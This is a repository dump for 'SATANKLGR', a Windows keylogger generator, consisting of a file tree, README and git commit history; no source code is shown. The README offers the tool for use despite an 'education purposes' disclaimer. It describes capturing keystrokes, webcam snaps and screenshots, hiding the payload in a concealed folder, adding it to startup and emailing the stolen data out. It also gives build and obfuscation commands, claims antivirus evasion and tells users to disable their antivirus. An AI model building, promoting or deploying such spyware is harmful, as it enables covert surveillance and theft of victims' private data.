======================: FILES :======================
SATANKLGR
├── launcher.py
├── LICENSE
├── README.md
├── requirements.txt
├── Scripts
│   ├── all.txt
│   ├── keystrokes+screenshots.txt
│   ├── keystrokes.txt
│   ├── keystrokes+webcam.txt
│   ├── screenshots.txt
│   ├── webcam+screenshots.txt
│   └── webcam.txt
├── Source Code
│   ├── keystrokes.py
│   ├── keystrokes+webcam.py
│   ├── screenshot+keystrokes.py
│   ├── screenshot.py
│   ├── webcam.py
│   ├── webcam+screenshot+keystrokes.py
│   └── webcam+screenshots.py
├── startup.py
└── terminate.bat

2 directories, 20 files
======================: README CONTENT :======================
## SATANKLGR

![dfsd](https://user-images.githubusercontent.com/92334349/147391569-5c5192f5-6829-49a3-b43d-9a5eb9d4f597.png)

⛤Keylogger Generator for Windows written in Python⛤

## Disclamer

THIS SOFTWARE IS INTENDED ONLY FOR EDUCATION PURPOSES! DO NOT USE IT TO INFLICT 
DAMAGE TO ANYONE! USING MY APPLICATION YOU ARE AUTHOMATICALLY AGREE WITH ALL RULES AND
TAKE RESPONSIBITITY FOR YOUR ACTION! THE VIOLATION OF LAWS CAN CAUSE SERIOUS CONSEQUENCES!
THE DEVELOPER FZGbzuw412 ASSUMES NO LIABILITY AND IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE 
CAUSED BY THIS PROGRAM.

## Features
- [x] Keystrokes
- [x] Webcam
- [x] Screenshots
- [x] Persistence

## Intended for:
Windows systems of all versions (Windows 10 is highly recommended)

## Requirements
+ [Python 3.9](https://www.python.org/downloads/release/python-390/).
+ Pillow==9.0.0
+ opencv-python==4.5.3.56
+ pyinstaller==4.6
+ pyarmor==7.2.3

## Usage
```
#clone or download zip archive
git clone https://github.com/FZGbzuw412/SATANKLGR.git

# go to directory with files
cd SATANKLGR 

#install essential requirements
pip3 install -r requirements.txt

#launch the installer
python3 launcher.py
#or
launcher.py

#compile startup.py
pyinstaller --onefile startup.py
```

## How it works
When you launch compiled ```startup.exe``` it authomatically creates a [hidden foulder](https://github.com/FZGbzuw412/SATANKLGR#hidden-foulder) in C disk and move ```SATANKLGR.exe``` to this [foulder](https://github.com/FZGbzuw412/SATANKLGR#hidden-foulder). Then it launches ```SATANKLGR.exe``` from the foulder and the programm appears in Task Manager and works here all of the time. After that moment you can delete ```startup.exe```. Subsequently, the application will add taken screenshots and webcam snaps to the ```Public 3D Objects``` gradually. After app send them to [specified email](https://github.com/FZGbzuw412/SATANKLGR#messages). In case you choose all options it will work the same way, but if you have chosen an option without webcam and screenshots it will not create a foulder. If you generated file containing all the stuff it will add an exeption to the code, so on condition that webcamera is unplugged the programm will not be terminated.

# Note
- This application intended only for Windows Systems. In order to make an .exe file you have to launch [launcher.py](https://github.com/FZGbzuw412/SATANKLGR/blob/main/launcher.py) only on Windows.

- Besides, you need to have python 3.9.0 installed on your PC. Currently it is impossible to make an .exe file of OpenCV using the latest version of pyinstaller
and pyarmor. 

- It is possible to run SATANKLGR on Linux, however you will get only .py file with source code. Afterwards you can go to Windows and compile file to .exe using 
```pyarmor pack --clean -e "--onefile --windowed --icon=NONE" SATANKLGR.py```

- If you have an antivirus, turn it off when you launch the ```launcher.py```

# Advantages
+ Compatible with all versions of Windows including Windows 10
+ Getting obfuscated .exe file to defend your data from disassembling
+ Fast fixing code if you have any problems
+ Not detected by antiviruses
+ Making hidden foulder in C:\ disk
+ Authomatical removing files after sending to email
+ Adding to StartUp

# Terminating Keylogger
So as to terminate the session of keylogger launch [terminate.bat](https://github.com/FZGbzuw412/SATANKLGR/blob/main/terminate.bat)

# FAQ
_Is it legal?_  
> Yes. But only if your target machine is your own computer or you do the **allowed** penetration testing  
<br/> 




_Where can I find the source code_?  
> If you want to learn my code, go to the [Source Code](https://github.com/FZGbzuw412/SATANKLGR/tree/main/Source%20Code) foulder.  
<br/>  

_Do you intend to proceed the development of this tool?_  
> For sure. And you can help me with it. If you have your suggestions or offers, feel free to write [here](https://github.com/FZGbzuw412/SATANKLGR#contacts)  

# Screenshots
## Generate

![z7IgeP0U2d](https://user-images.githubusercontent.com/92334349/147340454-140a887b-b260-44b5-a47e-647fe9ed7237.gif)


## Launch

![wn84FpnDWU](https://user-images.githubusercontent.com/92334349/147401879-6e9d8012-e293-49f8-b77e-f1e9ddb35bb1.gif)

## Messages

![firefox_5Gp9T9XDPn](https://user-images.githubusercontent.com/92334349/147340577-da4645e8-4bf6-4610-85e4-1564ff48f058.png)

![PicasaPhotoViewer_tnWrOMeImg](https://user-images.githubusercontent.com/92334349/147390780-3f440d08-a720-45a0-bfa3-465012769989.png)

![PicasaPhotoViewer_gjoRMIyQDM](https://user-images.githubusercontent.com/92334349/147390746-9d1aa380-9042-4630-a7aa-2a1145ea116b.png)

## Hidden Foulder

![explorer_idvTX28Ly4](https://user-images.githubusercontent.com/92334349/147340598-a9accbd0-299d-4ce4-9c72-136715023bef.png)

![explorer_7IR4bL2EQP](https://user-images.githubusercontent.com/92334349/147340604-1b5dbc9a-66fc-4711-ab09-668f66a201d1.png)


## Contacts
If you have any suggestions concerning this project refer to FZGbzuw412a@protonmail.com

## Licence
  
    Copyright (c) 2021 FZGbzuw412

    Permission is hereby granted, free of charge, to any person obtaining a copy
    of this software and associated documentation files (the "Software"), to deal
    in the Software without restriction, including without limitation the rights
    to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the Software is
    furnished to do so, subject to the following conditions:

    The above copyright notice and this permission notice shall be included in all
    copies or substantial portions of the Software.

    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
    IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
    FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
    AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
    LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
    OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
    SOFTWARE.
====================== GIT HISTORY: ======================
0fd7c48 HEAD@{0}: clone: from https://github.com/FZGbzuw412/SATANKLGR
commit 0fd7c48d16211aa4e49987a844565e2bd5e61313
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Feb 5 09:33:39 2022 +0300

    Update README.md

commit 22bbfccbea99810eb056278f55e6ecce1f877087
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Feb 1 22:25:02 2022 +0300

    Delete default.ico

commit 912d994cec8484ea6bb259ee8c82a47f3c7668ca
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Feb 1 22:24:30 2022 +0300

    Update launcher.py

commit df6e5416b9cff74233043911e8483975508d12f2
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Jan 29 09:25:05 2022 +0300

    Update README.md

commit c1fd13f23677214a69e675f57158d22aff9d6e03
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Jan 29 09:24:40 2022 +0300

    Update requirements.txt

commit d72a283e5c4303cc83f79121bc7e86f09bf51267
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Jan 4 16:55:46 2022 +0300

    Update README.md

commit 50afc29a9409c918b4d95bc51486b67bffc60292
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Thu Dec 30 00:12:40 2021 +0300

    Update README.md

commit 84a50471fed1e97abf3378398274f2a3b1d95af7
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Thu Dec 30 00:11:49 2021 +0300

    Update launcher.py

commit 6e23b043c5d8424c95673c99b01648a6a15b77ee
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Wed Dec 29 18:16:51 2021 +0300

    Update README.md

commit 1eb3cf1b5c758f73a5319a4edd00ec67b9bed944
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Wed Dec 29 18:16:29 2021 +0300

    Update README.md

commit e577c009a278f3ef890cdf4a00cba8f7221cbf93
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Wed Dec 29 18:09:44 2021 +0300

    Add files via upload

commit 72916455d98d41b9f3ad7dda63b4c71753b36d3b
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Wed Dec 29 18:09:33 2021 +0300

    Delete launcher.py

commit cd15ffa02e2561f3080606de8160a177182387a7
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Wed Dec 29 18:09:20 2021 +0300

    Add files via upload

commit 1d5dcf3f0d6c45ced1c090dee7ffda208b25186a
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Wed Dec 29 18:08:59 2021 +0300

    Update README.md

commit a1a351460de3582d1a9dcfc40a7b51c77d9a1801
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Dec 28 22:37:34 2021 +0300

    Update README.md

commit d092b1183752d87a55f71ffddfdf5c48898f2c3f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Dec 28 19:27:49 2021 +0300

    Update terminate.bat

commit a64e5c9aa6f72a7842a09e5c006e81cd513ba79a
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Dec 28 19:17:57 2021 +0300

    Update README.md

commit e9e18f65e23f02796e0692ce64789ad65e80a603
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Dec 28 19:17:37 2021 +0300

    Update README.md

commit 11efcedf761fd71cdbadb38f8ff54d41dfd76731
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Dec 28 19:15:53 2021 +0300

    Update README.md

commit ae357a7919561dc3b2e8af3250053179b5584549
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Tue Dec 28 19:15:23 2021 +0300

    Update README.md

commit 0c28199e4d41eab36a7e65fe3ec2ce32b7f312e9
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 09:01:32 2021 +0300

    Update terminate.bat

commit 3b6355b57fc9947659d20c9bdac63a3938da98f3
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:57:15 2021 +0300

    Update README.md

commit 42e35ac48fdb27876595860062f82be95c0233a0
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:54:44 2021 +0300

    Update README.md

commit 7fc11c9143f61775ee9cb11b2deb12933871c7b7
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:51:55 2021 +0300

    Update README.md

commit 3ffe99b62f9855f25173adb7f8bcb9bfb690a7ff
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:50:50 2021 +0300

    Update README.md

commit a139cf74959ef7e0ee8c450d8aef85fc0e9ade4d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:50:03 2021 +0300

    Update README.md

commit f8dc526325e4f1b892f161a565ce4af72afab9ae
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:49:33 2021 +0300

    Update README.md

commit bdc47b638d3b574602d1b2381b565df077762df2
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:49:08 2021 +0300

    Update README.md

commit 1cd455a0df011782e82c0f951e16eb5f45a0a478
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:48:34 2021 +0300

    Update README.md

commit fb1bbe23721d4190fbfdda83045cb5863cc16618
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:48:12 2021 +0300

    Update README.md

commit af165f69f52e46579da0ccecc1cf84a96bcdf5bf
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:46:02 2021 +0300

    Update README.md

commit 28fe415ed183bb6cb33b50ca8764ba944cfb1e02
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:44:44 2021 +0300

    Update README.md

commit c0dec4544d8f792e8cd79a9ee0af38aeb4d17b0f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Mon Dec 27 08:44:10 2021 +0300

    Update README.md

commit 85b5d7fff12e26f0c4776a0695f2810df273eb0f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:31:32 2021 +0300

    Update webcam.py

commit 93c3eeff98981467143d07b5ae388863e1a917f7
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:31:23 2021 +0300

    Update webcam+screenshots.py

commit afcbc60c4c191f8529509fd120feebede6230522
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:31:12 2021 +0300

    Update webcam+screenshot+keystrokes.py

commit 9565704dda99feda134b25e2356672d620b0daff
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:30:56 2021 +0300

    Update screenshot.py

commit fb15e5263d03d078fc979e1c817f6b75484cbfbf
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:30:00 2021 +0300

    Update screenshot+keystrokes.py

commit 8a439f6870986a8391963e99fd51d97cb0104402
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:29:22 2021 +0300

    Update keystrokes.py

commit c04eb566f9f875ba42ef7c404c5774781abe59b3
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:28:53 2021 +0300

    Update keystrokes+webcam.py

commit 87a0b90e2e5baf4f10a501f0ebc2512df55bfe49
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 20:28:17 2021 +0300

    Add files via upload

commit c0703f30a6a6a95455fb90e96cd43794f4fe4b7e
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:14:41 2021 +0300

    Update README.md

commit f4f7f361b8dd7642925739adc6fdd1518e3b551d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:14:26 2021 +0300

    Update README.md

commit eb73056aa41496d927276164b75ecc926c6f8d01
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:13:45 2021 +0300

    Update README.md

commit 2fb2b06e61a3834697126bbab03a97e5492e2001
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:12:31 2021 +0300

    Update README.md

commit df2b5178053a9b800e660d6c8317bb12e6f43b4f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:10:19 2021 +0300

    Update README.md

commit 3fc808e6b25070e3b30ec2af95967bec7290921e
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:09:45 2021 +0300

    Create README.md

commit 8a282f750b5a32faf0451175bcb3a8f303bf6127
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:09:31 2021 +0300

    Update README.md

commit 5440701fadd2cee0dc1e1a36db3102f80eff4500
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:05:54 2021 +0300

    Update README.md

commit b9ad7d1acf105f55c8810d71e9cd1f67f9091ac0
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:05:43 2021 +0300

    Update README.md

commit 75b01f26a76a7cb83ea61ca053243d905544dff5
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:05:10 2021 +0300

    Update README.md

commit a4fd0ab1ce228e47c93d27b41ce042b9b81e35bd
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:04:35 2021 +0300

    Update README.md

commit 997ee8f2876cc0474b2b31098308afe2682aa4a7
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:04:15 2021 +0300

    Update README.md

commit b38c89d2f3d87b3aeec089925a78d7f871795822
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:04:03 2021 +0300

    Update README.md

commit 90bdb4b517cb091ef1bce3b3c6169c5b65cca695
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:02:54 2021 +0300

    Update README.md

commit fc8e35b565d979ec9acdac8843a8291a583ced73
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:02:30 2021 +0300

    Update README.md

commit 8ba1559dc7013c23665ed37db3f8fb0c151c6101
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:02:13 2021 +0300

    Update README.md

commit 2a0d12e21831d220a4157a90b345abb9e21eb827
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 17:02:00 2021 +0300

    Update README.md

commit 1581cf539e9f0a98d2759c360497e9004607b6b1
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:59:58 2021 +0300

    Update README.md

commit b043f9893d6a2bb750a986b1da8dd9e873bb6e52
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:59:34 2021 +0300

    Update README.md

commit 7e2d3bc41d90562e2ed40b171061c65af34ace28
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:58:18 2021 +0300

    Update README.md

commit 6aed20910f92283a6649e8e891f88b51df9a8611
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:54:35 2021 +0300

    Update README.md

commit 7f52ae672b5fb9f37955a758033ee6c58139cb48
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:53:36 2021 +0300

    Update README.md

commit 214441291ab782bb86ca264905de23659df856d5
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:53:17 2021 +0300

    Update README.md

commit 6623da210b4788dbbf7331992b260468b0e76d53
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:51:48 2021 +0300

    Update README.md

commit 085541e753b481ce454e71edb1fc2287143ff2c0
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:50:51 2021 +0300

    Update README.md

commit 49651d7975b4a8e137ace8c60fcd502145041501
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 16:48:43 2021 +0300

    Update README.md

commit acb71656c63bd83384cbdf9487487c5859df5e72
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 14:26:26 2021 +0300

    Update README.md

commit ef378dcdac177aaeef0e4ed93f02e1fe6d434ea2
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 14:26:00 2021 +0300

    Update README.md

commit fa2f8c86af82ef1bb5daf0fdf216965bfedf67c9
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 14:25:03 2021 +0300

    Update README.md

commit 195802c703485ff9d358278234ffd3d23adaabbc
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 14:23:12 2021 +0300

    Add files via upload

commit 98377b2e8fef9dfd159c9b0c487615106e63c049
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 13:03:14 2021 +0300

    Update README.md

commit a6b72f5d319ea96b660d6f5e6e38c3f4ae5357f5
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 13:01:39 2021 +0300

    Update README.md

commit 9cd4d8b9e1cd083472ac26b7c839d6317c407946
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 12:34:47 2021 +0300

    Update README.md

commit 453cb5531f4def78bec3321474ae76a22eef59ea
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 12:29:15 2021 +0300

    Update README.md

commit fa312912204a8f6b3a7caaf6e02bd008173596f2
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 12:04:53 2021 +0300

    Add files via upload

commit 9323bad995d7e4b38a427efff38a66ae979e0c3a
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 11:59:18 2021 +0300

    Update README.md

commit 484ab8bc0e85be50b5ce5ee0e6c747061ca57358
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 11:48:32 2021 +0300

    Update launcher.py

commit e0ddc77b43844901170317f90cf15f820bacba91
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 10:34:02 2021 +0300

    Update README.md

commit 341551c2ce9492a881cc595341f8fad006c127cb
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 10:30:46 2021 +0300

    Update README.md

commit d8e9e33a40f87166e04ccbe715f827c5fce0b357
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 10:24:06 2021 +0300

    Add files via upload

commit 5c909bbf00ea37a787ca6d6de686e5e56d6f8563
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sun Dec 26 10:23:00 2021 +0300

    Update terminate.bat

commit fbaf6e6960b55c8d9e8d83637821bf16e01ff3cd
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 23:22:25 2021 +0300

    Update README.md

commit 6e84f68b2659396469666dcfda8c6e4fafc644b2
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 23:21:20 2021 +0300

    Update README.md

commit 59ba642c0a34d498c60b65c562e2e031d3951ae0
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:10:22 2021 +0300

    Update README.md

commit cd1606d61694561b6c00e6889d08fbff95950cb8
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:08:20 2021 +0300

    Update README.md

commit 1c9820b65755590e3865c8411c106fc7593ad853
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:07:00 2021 +0300

    Update README.md

commit 0db7949dcdcc17f5f20cc3a97c25e03d689bcf17
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:03:43 2021 +0300

    Update README.md

commit 0f5c26e0ce832574028c87c9435f197683de986b
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:03:22 2021 +0300

    Update README.md

commit 9d2124e4b88431d96e5523a9f821c028b045b664
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:02:09 2021 +0300

    Update README.md

commit d69277efc92fb0fef97474d33373365a81591251
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 22:00:10 2021 +0300

    Update README.md

commit ecb4b8caef9cf96e90ffbebb1afe113601d60589
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:59:50 2021 +0300

    Update README.md

commit d26dc0937a16fe7e8b8d321485b040a625b6900c
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:53:23 2021 +0300

    Create README.md

commit 6325306225a60160af3c8601535f015f4c66f116
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:53:04 2021 +0300

    Update README.md

commit ec6d88b824716601a0389ad12cb25fc1ed6b6c55
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:47:20 2021 +0300

    Update README.md

commit ae107db39f3ea7b5c40e0e8f3109f93261bbd0ee
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:46:51 2021 +0300

    Update README.md

commit ae3805a6fe5ff41cf8f9efa2b13e94269752083f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:44:19 2021 +0300

    Update README.md

commit d8cdaa9e3f71c1cb49f81ada255d72da668baa8a
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:43:31 2021 +0300

    Update README.md

commit ced5b51d5f646b8fbf946bfc58f80504aab5645d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:40:32 2021 +0300

    Update README.md

commit f81f0582121ec232cf2023d1a907254135255b90
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:39:37 2021 +0300

    Update README.md

commit 47c672c2bf1534ce8b36586d2dd93d6e696a1c8e
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:39:17 2021 +0300

    Update README.md

commit ede03b757191b8cac3485fa43d9214d521ab19d1
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 21:35:43 2021 +0300

    Update README.md

commit 667dbfcc14c91aa62bcae5c69f84017860581ac5
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 20:54:53 2021 +0300

    Update README.md

commit 876e39711a396a0c392d51966ee3a11576243f9d
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 20:53:43 2021 +0300

    Update README.md

commit 41d8293df92aa4226a9349bdd947c46c63e808fc
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 19:47:43 2021 +0300

    Update README.md

commit ff95cb542aefeb4362f67342148fc1e0fa412d2a
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 19:47:32 2021 +0300

    Update README.md

commit 5490feb5a6fa318c4b516d1ef4d984875cb265f5
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 19:43:51 2021 +0300

    Update terminate.bat

commit 6d8176215c5aad44d5ca8a33784d6872d51d3f67
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 19:42:24 2021 +0300

    Update launcher.py

commit e8f31f2f62502f897741038cf65b03b42efed28f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 19:20:23 2021 +0300

    Delete addtosturtup.py

commit 30316dcbc8c1cd31c5bd3765b318a039a4961b19
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 11:29:55 2021 +0300

    Update terminate.bat

commit c0752e89ac42ccba2792b17fc5503c39b6a72c33
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 10:42:51 2021 +0300

    Update terminate.bat

commit 58ade854a80a2e4df7bcaed5a979ab7bdcdaa281
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 10:41:38 2021 +0300

    Update README.md

commit cff300de704f23a951e1f107f941d1fc23aa2342
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 10:38:20 2021 +0300

    Add files via upload

commit d636997ef8e04a9180662b6914ef606cadfb02da
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 10:38:08 2021 +0300

    Delete launcher.py

commit 3b96318928a641183b7bdf7396e53580a2babbe5
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Sat Dec 25 10:37:56 2021 +0300

    Update addtosturtup.py

commit 3265706ebb2873ac6c9cc9d4df10ce553dced104
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 21:51:46 2021 +0300

    Update launcher.py

commit 73b23473e4b14d189ea835f1b8feb47156a8dc54
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 20:50:39 2021 +0300

    Update README.md

commit 3c2f4327427466082dccab28373ce08c750d475f
Author: FZGbzuw412 <92334349+FZGbzuw412@users.noreply.github.com>
Date:   Fri Dec 24 20:49:37 2021 +0300

